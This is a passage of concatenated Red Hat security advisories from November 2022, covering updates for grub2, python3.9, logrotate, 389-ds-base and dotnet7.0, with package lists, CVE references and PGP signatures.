grub2-tools-debuginfo-2.02-87.el8_1.11.ppc64le.rpm  
grub2-tools-extra-2.02-87.el8_1.11.ppc64le.rpm  
grub2-tools-extra-debuginfo-2.02-87.el8_1.11.ppc64le.rpm  
grub2-tools-minimal-2.02-87.el8_1.11.ppc64le.rpm  
grub2-tools-minimal-debuginfo-2.02-87.el8_1.11.ppc64le.rpm

x86_64:  
grub2-debuginfo-2.02-87.el8_1.11.x86_64.rpm  
grub2-debugsource-2.02-87.el8_1.11.x86_64.rpm  
grub2-efi-ia32-2.02-87.el8_1.11.x86_64.rpm  
grub2-efi-ia32-cdboot-2.02-87.el8_1.11.x86_64.rpm  
grub2-efi-x64-2.02-87.el8_1.11.x86_64.rpm  
grub2-efi-x64-cdboot-2.02-87.el8_1.11.x86_64.rpm  
grub2-pc-2.02-87.el8_1.11.x86_64.rpm  
grub2-tools-2.02-87.el8_1.11.x86_64.rpm  
grub2-tools-debuginfo-2.02-87.el8_1.11.x86_64.rpm  
grub2-tools-efi-2.02-87.el8_1.11.x86_64.rpm  
grub2-tools-efi-debuginfo-2.02-87.el8_1.11.x86_64.rpm  
grub2-tools-extra-2.02-87.el8_1.11.x86_64.rpm  
grub2-tools-extra-debuginfo-2.02-87.el8_1.11.x86_64.rpm  
grub2-tools-minimal-2.02-87.el8_1.11.x86_64.rpm  
grub2-tools-minimal-debuginfo-2.02-87.el8_1.11.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2601  
https://access.redhat.com/security/cve/CVE-2022-3775  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3TdyNzjgjWX9erEAQiEshAAib56xO7sRXwIM3waFbxLUNnCK9FCTj4u  
5B1pMVpJCDEjK7YnMJswzAOlFNWAtkW2HPmVNWrkuaggE9X2MOcQ3DRuiYwh5osl  
nSjrIsMfIoNxKmzaTMHMCWeUrqrgXT62QWK7DTeWbzslEY7nkDe2A+FAaNvM9+8m  
SG98wI5aViLl8l/iIdairnah9ErZK0qaLNhRG/RcAtbV3tOT7pVTON4m/+Nq169o  
UPNdM4n+krTaRgPh44iFiBMMWUQrx0i9bbaZyEBuc/KrmrRJeH3IpkTbelkebAZ/  
WHOHTl2tZxTfs2XXsWnwsiRi+dibZo2yyDpkHUv3RUtGv2i8wh1nBegU7cu2y9x5  
KYAME6cMZSzanYsI3BQS3fBCrJDFibq0e6FIHPS/f3gvzKO6enXk8UxiOx7mU5qD  
FDLXk1xByLyaZyuWGQsuUMyW0C1kv2EVejzU8bDukBqveViVxqTqYchudjNLTX5/  
ekg2URtEhkXdsZ+zXt5896+pcfvZhaM1lQsYd+IE0qwmTxwlXPnPeAT+hqvkcaXS  
uTLvlRjX1Sm+0U4CE7FuQ8UpdVstjgz5szaY95DTgR/Pgz23P50BCtbIF44sG2Ny  
2RurgVM10rUaqubclHVBI2pQ3bswdTybBLcQlm7R2gSJUFz7Nh+RorKdPb+JdRcB  
xkkoPjoK7dY=nLp7  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8494-01

Red Hat Security Advisory 2022-8493-01 - Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. Issues addressed include a privilege escalation vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: python3.9 security update  
Advisory ID:       RHSA-2022:8493-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8493  
Issue date:        2022-11-16  
CVE Names:         CVE-2022-42919  
====================================================================  
1. Summary:

An update for python3.9 is now available for Red Hat Enterprise Linux 9 and  
Red Hat Enterprise Linux 9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat CodeReady Linux Builder EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

Python is an interpreted, interactive, object-oriented programming  
language, which includes modules, classes, exceptions, very high level  
dynamic data types and dynamic typing. Python supports interfaces to many  
system calls and libraries, as well as to various windowing systems.

Security Fix(es):

* python: local privilege escalation via the multiprocessing forkserver  
start method (CVE-2022-42919)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2138705 - CVE-2022-42919 python: local privilege escalation via the multiprocessing forkserver start method

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

aarch64:  
python3-devel-3.9.10-4.el9_0.aarch64.rpm  
python3-tkinter-3.9.10-4.el9_0.aarch64.rpm  
python3.9-debuginfo-3.9.10-4.el9_0.aarch64.rpm  
python3.9-debugsource-3.9.10-4.el9_0.aarch64.rpm

noarch:  
python-unversioned-command-3.9.10-4.el9_0.noarch.rpm

ppc64le:  
python3-devel-3.9.10-4.el9_0.ppc64le.rpm  
python3-tkinter-3.9.10-4.el9_0.ppc64le.rpm  
python3.9-debuginfo-3.9.10-4.el9_0.ppc64le.rpm  
python3.9-debugsource-3.9.10-4.el9_0.ppc64le.rpm

s390x:  
python3-devel-3.9.10-4.el9_0.s390x.rpm  
python3-tkinter-3.9.10-4.el9_0.s390x.rpm  
python3.9-debuginfo-3.9.10-4.el9_0.s390x.rpm  
python3.9-debugsource-3.9.10-4.el9_0.s390x.rpm

x86_64:  
python3-devel-3.9.10-4.el9_0.i686.rpm  
python3-devel-3.9.10-4.el9_0.x86_64.rpm  
python3-tkinter-3.9.10-4.el9_0.x86_64.rpm  
python3.9-debuginfo-3.9.10-4.el9_0.i686.rpm  
python3.9-debuginfo-3.9.10-4.el9_0.x86_64.rpm  
python3.9-debugsource-3.9.10-4.el9_0.i686.rpm  
python3.9-debugsource-3.9.10-4.el9_0.x86_64.rpm

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
python3-devel-3.9.14-1.el9_1.1.aarch64.rpm  
python3-tkinter-3.9.14-1.el9_1.1.aarch64.rpm  
python3.9-debuginfo-3.9.14-1.el9_1.1.aarch64.rpm  
python3.9-debugsource-3.9.14-1.el9_1.1.aarch64.rpm

noarch:  
python-unversioned-command-3.9.14-1.el9_1.1.noarch.rpm

ppc64le:  
python3-devel-3.9.14-1.el9_1.1.ppc64le.rpm  
python3-tkinter-3.9.14-1.el9_1.1.ppc64le.rpm  
python3.9-debuginfo-3.9.14-1.el9_1.1.ppc64le.rpm  
python3.9-debugsource-3.9.14-1.el9_1.1.ppc64le.rpm

s390x:  
python3-devel-3.9.14-1.el9_1.1.s390x.rpm  
python3-tkinter-3.9.14-1.el9_1.1.s390x.rpm  
python3.9-debuginfo-3.9.14-1.el9_1.1.s390x.rpm  
python3.9-debugsource-3.9.14-1.el9_1.1.s390x.rpm

x86_64:  
python3-devel-3.9.14-1.el9_1.1.i686.rpm  
python3-devel-3.9.14-1.el9_1.1.x86_64.rpm  
python3-tkinter-3.9.14-1.el9_1.1.x86_64.rpm  
python3.9-debuginfo-3.9.14-1.el9_1.1.i686.rpm  
python3.9-debuginfo-3.9.14-1.el9_1.1.x86_64.rpm  
python3.9-debugsource-3.9.14-1.el9_1.1.i686.rpm  
python3.9-debugsource-3.9.14-1.el9_1.1.x86_64.rpm

Red Hat Enterprise Linux BaseOS EUS (v.9.0):

Source:  
python3.9-3.9.10-4.el9_0.src.rpm

aarch64:  
python3-3.9.10-4.el9_0.aarch64.rpm  
python3-libs-3.9.10-4.el9_0.aarch64.rpm  
python3.9-debuginfo-3.9.10-4.el9_0.aarch64.rpm  
python3.9-debugsource-3.9.10-4.el9_0.aarch64.rpm

ppc64le:  
python3-3.9.10-4.el9_0.ppc64le.rpm  
python3-libs-3.9.10-4.el9_0.ppc64le.rpm  
python3.9-debuginfo-3.9.10-4.el9_0.ppc64le.rpm  
python3.9-debugsource-3.9.10-4.el9_0.ppc64le.rpm

s390x:  
python3-3.9.10-4.el9_0.s390x.rpm  
python3-libs-3.9.10-4.el9_0.s390x.rpm  
python3.9-debuginfo-3.9.10-4.el9_0.s390x.rpm  
python3.9-debugsource-3.9.10-4.el9_0.s390x.rpm

x86_64:  
python3-3.9.10-4.el9_0.x86_64.rpm  
python3-libs-3.9.10-4.el9_0.i686.rpm  
python3-libs-3.9.10-4.el9_0.x86_64.rpm  
python3.9-debuginfo-3.9.10-4.el9_0.i686.rpm  
python3.9-debuginfo-3.9.10-4.el9_0.x86_64.rpm  
python3.9-debugsource-3.9.10-4.el9_0.i686.rpm  
python3.9-debugsource-3.9.10-4.el9_0.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
python3.9-3.9.14-1.el9_1.1.src.rpm

aarch64:  
python3-3.9.14-1.el9_1.1.aarch64.rpm  
python3-libs-3.9.14-1.el9_1.1.aarch64.rpm  
python3.9-debuginfo-3.9.14-1.el9_1.1.aarch64.rpm  
python3.9-debugsource-3.9.14-1.el9_1.1.aarch64.rpm

ppc64le:  
python3-3.9.14-1.el9_1.1.ppc64le.rpm  
python3-libs-3.9.14-1.el9_1.1.ppc64le.rpm  
python3.9-debuginfo-3.9.14-1.el9_1.1.ppc64le.rpm  
python3.9-debugsource-3.9.14-1.el9_1.1.ppc64le.rpm

s390x:  
python3-3.9.14-1.el9_1.1.s390x.rpm  
python3-libs-3.9.14-1.el9_1.1.s390x.rpm  
python3.9-debuginfo-3.9.14-1.el9_1.1.s390x.rpm  
python3.9-debugsource-3.9.14-1.el9_1.1.s390x.rpm

x86_64:  
python3-3.9.14-1.el9_1.1.x86_64.rpm  
python3-libs-3.9.14-1.el9_1.1.i686.rpm  
python3-libs-3.9.14-1.el9_1.1.x86_64.rpm  
python3.9-debuginfo-3.9.14-1.el9_1.1.i686.rpm  
python3.9-debuginfo-3.9.14-1.el9_1.1.x86_64.rpm  
python3.9-debugsource-3.9.14-1.el9_1.1.i686.rpm  
python3.9-debugsource-3.9.14-1.el9_1.1.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.9.0):

aarch64:  
python3-debug-3.9.10-4.el9_0.aarch64.rpm  
python3-idle-3.9.10-4.el9_0.aarch64.rpm  
python3-test-3.9.10-4.el9_0.aarch64.rpm  
python3.9-debuginfo-3.9.10-4.el9_0.aarch64.rpm  
python3.9-debugsource-3.9.10-4.el9_0.aarch64.rpm

ppc64le:  
python3-debug-3.9.10-4.el9_0.ppc64le.rpm  
python3-idle-3.9.10-4.el9_0.ppc64le.rpm  
python3-test-3.9.10-4.el9_0.ppc64le.rpm  
python3.9-debuginfo-3.9.10-4.el9_0.ppc64le.rpm  
python3.9-debugsource-3.9.10-4.el9_0.ppc64le.rpm

s390x:  
python3-debug-3.9.10-4.el9_0.s390x.rpm  
python3-idle-3.9.10-4.el9_0.s390x.rpm  
python3-test-3.9.10-4.el9_0.s390x.rpm  
python3.9-debuginfo-3.9.10-4.el9_0.s390x.rpm  
python3.9-debugsource-3.9.10-4.el9_0.s390x.rpm

x86_64:  
python3-3.9.10-4.el9_0.i686.rpm  
python3-debug-3.9.10-4.el9_0.i686.rpm  
python3-debug-3.9.10-4.el9_0.x86_64.rpm  
python3-idle-3.9.10-4.el9_0.i686.rpm  
python3-idle-3.9.10-4.el9_0.x86_64.rpm  
python3-test-3.9.10-4.el9_0.i686.rpm  
python3-test-3.9.10-4.el9_0.x86_64.rpm  
python3-tkinter-3.9.10-4.el9_0.i686.rpm  
python3.9-debuginfo-3.9.10-4.el9_0.i686.rpm  
python3.9-debuginfo-3.9.10-4.el9_0.x86_64.rpm  
python3.9-debugsource-3.9.10-4.el9_0.i686.rpm  
python3.9-debugsource-3.9.10-4.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 9):

aarch64:  
python3-debug-3.9.14-1.el9_1.1.aarch64.rpm  
python3-idle-3.9.14-1.el9_1.1.aarch64.rpm  
python3-test-3.9.14-1.el9_1.1.aarch64.rpm  
python3.9-debuginfo-3.9.14-1.el9_1.1.aarch64.rpm  
python3.9-debugsource-3.9.14-1.el9_1.1.aarch64.rpm

ppc64le:  
python3-debug-3.9.14-1.el9_1.1.ppc64le.rpm  
python3-idle-3.9.14-1.el9_1.1.ppc64le.rpm  
python3-test-3.9.14-1.el9_1.1.ppc64le.rpm  
python3.9-debuginfo-3.9.14-1.el9_1.1.ppc64le.rpm  
python3.9-debugsource-3.9.14-1.el9_1.1.ppc64le.rpm

s390x:  
python3-debug-3.9.14-1.el9_1.1.s390x.rpm  
python3-idle-3.9.14-1.el9_1.1.s390x.rpm  
python3-test-3.9.14-1.el9_1.1.s390x.rpm  
python3.9-debuginfo-3.9.14-1.el9_1.1.s390x.rpm  
python3.9-debugsource-3.9.14-1.el9_1.1.s390x.rpm

x86_64:  
python3-3.9.14-1.el9_1.1.i686.rpm  
python3-debug-3.9.14-1.el9_1.1.i686.rpm  
python3-debug-3.9.14-1.el9_1.1.x86_64.rpm  
python3-idle-3.9.14-1.el9_1.1.i686.rpm  
python3-idle-3.9.14-1.el9_1.1.x86_64.rpm  
python3-test-3.9.14-1.el9_1.1.i686.rpm  
python3-test-3.9.14-1.el9_1.1.x86_64.rpm  
python3-tkinter-3.9.14-1.el9_1.1.i686.rpm  
python3.9-debuginfo-3.9.14-1.el9_1.1.i686.rpm  
python3.9-debuginfo-3.9.14-1.el9_1.1.x86_64.rpm  
python3.9-debugsource-3.9.14-1.el9_1.1.i686.rpm  
python3.9-debugsource-3.9.14-1.el9_1.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42919  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3Tdy9zjgjWX9erEAQgQlw/9E/baKrYdqjoFn64jSV6ZuTpuwLk4QAON  
BczOHAzegRliHncid+gSkHU2Wgv+WlMfGgaS2crj528jrazl4fPFUNSOB4wM4ZlZ  
AM/9elfinOBCnwRxEDHIix6uvLlUIH6NvmVip0PPMcMYmRRZB1MUh+22XzjzchIM  
UwztMKJsPgMd35Z6aiKUzwmhFT2dq8uY3x4LTRlkA41jgX6eyeCmQugJF8CoeBrg  
kNdejMJjwHX+RZ6q0jP7Pm4eiSVEIst3zyzuZw/EJKj7bIjZmcGUNfgr+4PR0yql  
XwOeTmj2bfP7nFm5zDTaLvhLdLYKU/L23AfQsMl2Hvja+LT7sZqRWIssYkHm7bfo  
mM5L7mHVpoQYCEfIPlrHUNv0Dcc4NLG8EMfOnMp87UN1nVlBv8+kVpINea8LQFYn  
SWeM7U+uQTRCjIokaC0Zq31hOmFDJ+RlRvFaXSU2Ak1a8yt4FNBF3Nt8l4T818fG  
CGR1sCrHDHl2XvODMAvBCuge14Jjx4updyfOC5kNb7VyC0FZh9WAJQwEAPhSP4Zf  
RYKD3Hn6/O8AKQgRCiLkBC+IWOpGah2dNgbFUbSbyRhIbbJIZF7YLciOibKypfqw  
j2/cKt2Blol1nGH+XI0qXhoazi0cadt51SlZU1RGgg6wx/NuFjfELa62hXbhRCTz  
X/+FBFRPF9Q=KI+u  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8493-01

Red Hat Security Advisory 2022-8393-01 - The logrotate utility simplifies the administration of multiple log files by allowing their automatic rotation, compression, removal, and mailing. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: logrotate security update  
Advisory ID:       RHSA-2022:8393-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8393  
Issue date:        2022-11-15  
CVE Names:         CVE-2022-1348  
====================================================================  
1. Summary:

An update for logrotate is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The logrotate utility simplifies the administration of multiple log files  
by allowing their automatic rotation, compression, removal, and mailing.

Security Fix(es):

* logrotate: potential DoS from unprivileged users via the state file  
(CVE-2022-1348)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat  
Enterprise Linux 9.1 Release Notes linked from the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2075074 - CVE-2022-1348 logrotate: potential DoS from unprivileged users via the state file

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
logrotate-3.18.0-7.el9.src.rpm

aarch64:  
logrotate-3.18.0-7.el9.aarch64.rpm  
logrotate-debuginfo-3.18.0-7.el9.aarch64.rpm  
logrotate-debugsource-3.18.0-7.el9.aarch64.rpm

ppc64le:  
logrotate-3.18.0-7.el9.ppc64le.rpm  
logrotate-debuginfo-3.18.0-7.el9.ppc64le.rpm  
logrotate-debugsource-3.18.0-7.el9.ppc64le.rpm

s390x:  
logrotate-3.18.0-7.el9.s390x.rpm  
logrotate-debuginfo-3.18.0-7.el9.s390x.rpm  
logrotate-debugsource-3.18.0-7.el9.s390x.rpm

x86_64:  
logrotate-3.18.0-7.el9.x86_64.rpm  
logrotate-debuginfo-3.18.0-7.el9.x86_64.rpm  
logrotate-debugsource-3.18.0-7.el9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1348  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.1_release_notes/index

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3PgwtzjgjWX9erEAQgPmg//XDihBmjNzDGuBNxDN3mZYrK3THeevs/u  
ii9c+qJK83fFK+dagldHlyZOtR12qWRtBjrw91E9I5zIVTgzkcFv8hu/8v8p9Ocr  
WlHTRzE2Kblai9pXRr49km3GL9thG7KTYNDT/BwV09jqYqVJsrly1AHf96rvHIUp  
uyL3Be+PMO6Q18KwvpBd3m3BaaJOhhi8NHZHIF/FhIqdPfLnxRMSJP7dOAnycZAH  
6wNV8XqtHt332/PQoZSUmg9Y1NmcCeQlbIVgCn6z4G5qP8EXTSMCr21ZoP3UuWv8  
HjGjGg+B/5AU4Wj9wzjm3R/ruITxJLQtN0tew7h9tBiVsRj0j6xaD5BZg25DbSV4  
fDPGLTyDFWPk6TJhW0SQ5/Ohc11XgiwGF7sTwMeig+1DXuWr9qFfxwYiW3zQtEpi  
Ko7C+s0Yrv35jfZMRLIz1w+3Iu35Zg93+ZHCbtbWoJZ4pKYR9H4JB9dhGuijhN/x  
4G0zgpNppzUoVkeVT3heLpBLNDck0T3sfYqEdw+CEMgLfwMmxlAas49JVGQO8Alo  
3H/dwSXUepnwYm1TiBSTZR4u9FB7280VjMN8oKsFFNX16FWhmi09X+NLnvyCRIUp  
tdN3Z1Uqr5lNlJ6QdQ+ZWCvmLHHYnBRHBFlJE/A7fqjlNJ3z3eeumulif9Py6xHu  
JfZ7LQO99Lc=8Hyc  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8393-01

Red Hat Security Advisory 2022-8162-01 - 389 Directory Server is an LDAP version 3 compliant server. The base packages include the Lightweight Directory Access Protocol server and command-line utilities for server administration. Issues addressed include denial of service and memory leak vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: 389-ds-base security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:8162-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8162  
Issue date:        2022-11-15  
CVE Names:         CVE-2022-0918 CVE-2022-0996 CVE-2022-2850  
====================================================================  
1. Summary:

An update for 389-ds-base is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

389 Directory Server is an LDAP version 3 (LDAPv3) compliant server. The  
base packages include the Lightweight Directory Access Protocol (LDAP)  
server and command-line utilities for server administration.

The following packages have been upgraded to a later upstream version:  
389-ds-base (2.1.3). (BZ#2061801)

Security Fix(es):

* 389-ds-base: sending crafted message could result in DoS (CVE-2022-0918)

* 389-ds-base: SIGSEGV in sync_repl (CVE-2022-2850)

* 389-ds-base: expired password was still allowed to access the database  
(CVE-2022-0996)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat  
Enterprise Linux 9.1 Release Notes linked from the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the 389 server service will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

1872451 - [RFE] 389ds: run as non-root  
2052527 - RFE - Provide an option to abort an Auto Member rebuild task.  
2055815 - CVE-2022-0918 389-ds-base: sending crafted message could result in DoS  
2057056 - Import may break the replication because changelog starting csn may not be created  
2057063 - Add support for recursively deleting subentries  
2061801 - Rebase 389-ds-base in RHEL 9.1  
2064769 - CVE-2022-0996 389-ds-base: expired password was still allowed to access the database  
2100337 - dsconf backend export userroot fails  ldap.DECODING_ERROR  
2100572 - Versions for RHDS 9.1 do not match in dirsrv logs and output from rpm -qa  
2115348 - memory leak with filter optimizer  
2118691 - CVE-2022-2850 389-ds-base: SIGSEGV in sync_repl

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
389-ds-base-2.1.3-4.el9_1.src.rpm

aarch64:  
389-ds-base-2.1.3-4.el9_1.aarch64.rpm  
389-ds-base-debuginfo-2.1.3-4.el9_1.aarch64.rpm  
389-ds-base-debugsource-2.1.3-4.el9_1.aarch64.rpm  
389-ds-base-libs-2.1.3-4.el9_1.aarch64.rpm  
389-ds-base-libs-debuginfo-2.1.3-4.el9_1.aarch64.rpm  
389-ds-base-snmp-debuginfo-2.1.3-4.el9_1.aarch64.rpm

noarch:  
python3-lib389-2.1.3-4.el9_1.noarch.rpm

ppc64le:  
389-ds-base-2.1.3-4.el9_1.ppc64le.rpm  
389-ds-base-debuginfo-2.1.3-4.el9_1.ppc64le.rpm  
389-ds-base-debugsource-2.1.3-4.el9_1.ppc64le.rpm  
389-ds-base-libs-2.1.3-4.el9_1.ppc64le.rpm  
389-ds-base-libs-debuginfo-2.1.3-4.el9_1.ppc64le.rpm  
389-ds-base-snmp-debuginfo-2.1.3-4.el9_1.ppc64le.rpm

s390x:  
389-ds-base-2.1.3-4.el9_1.s390x.rpm  
389-ds-base-debuginfo-2.1.3-4.el9_1.s390x.rpm  
389-ds-base-debugsource-2.1.3-4.el9_1.s390x.rpm  
389-ds-base-libs-2.1.3-4.el9_1.s390x.rpm  
389-ds-base-libs-debuginfo-2.1.3-4.el9_1.s390x.rpm  
389-ds-base-snmp-debuginfo-2.1.3-4.el9_1.s390x.rpm

x86_64:  
389-ds-base-2.1.3-4.el9_1.x86_64.rpm  
389-ds-base-debuginfo-2.1.3-4.el9_1.x86_64.rpm  
389-ds-base-debugsource-2.1.3-4.el9_1.x86_64.rpm  
389-ds-base-libs-2.1.3-4.el9_1.x86_64.rpm  
389-ds-base-libs-debuginfo-2.1.3-4.el9_1.x86_64.rpm  
389-ds-base-snmp-debuginfo-2.1.3-4.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-0918  
https://access.redhat.com/security/cve/CVE-2022-0996  
https://access.redhat.com/security/cve/CVE-2022-2850  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.1_release_notes/index

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3PhHNzjgjWX9erEAQi3Lw/+Kp2fj71Eme7k3P5fYZon8pjEsHOaHuSz  
FOTmU3hGViBe60UcUoyoERl2nbodmQ0yxozY4wz6H+TMHiTq1yj3LdiUQuZmOZMS  
+BUBzSR24iyPaXbLoa1+NwSm2+QnQuD8Ch5E4YwNJNRcRIYP2yaVJdcNi7RLU0I7  
aADq56AI4QX1D+0c1tSkybVTbgEpnNzABrvaapwD1eNwsVWaFJd46CZaf9WGt3ht  
irr6PYHnyvoirvJndRsuuLgW2vJxhvI/6PQtOgM0SMyWWiIschFLlkelrjVsdQIH  
f9J3Rk5kRCN7Kd9hKDIghsitB0ilod8gxvhyio6UzB9acbXj+a55J1nEjo2oalR8  
psXHcFRemMiPTMEh/W68PdbhifTcxa85Z4H/iVtEDgpIugJ5+B0j0+hdnzm3dncT  
IHsJVSayNuUqY04gpUhVsvEmzhVFogx9APJZmz4PhIaoGByX9Oti1t9IsqNENUVn  
l0n8u4h3Az4eo4l6/PKaF3DrIVLXzuC5HXvU4NOW4VsW4aM7tfVIlDUDxr8FUhUE  
8AKp+AThKmW2vFNTP9bnUNXQSMnKRFclO99w/f2SB+PjSb4IJzpIQ/QokXRQ8I2z  
CUsrBtF1HQfwHPPV1fU2NvnLmtDEcxFX0kGgU11BaVSgoRpqrUpNPHmnQp9FpQUb  
6ZLiLQ+itcM=dmbn  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8162-01

Red Hat Security Advisory 2022-8434-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.100 RC 2 and .NET Runtime 7.0.0 RC 2.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: dotnet7.0 security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:8434-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8434  
Issue date:        2022-11-15  
CVE Names:         CVE-2022-41032  
====================================================================  
1. Summary:

An update for dotnet7.0 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET SDK 7.0.100 RC 2 and .NET Runtime  
7.0.0 RC 2.

The following packages have been upgraded to a later upstream version:  
dotnet7.0 (7.0.100). (BZ#2134641)

Security Fix(es):

* dotnet: Nuget cache poisoning on Linux via world-writable cache directory  
(CVE-2022-41032)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

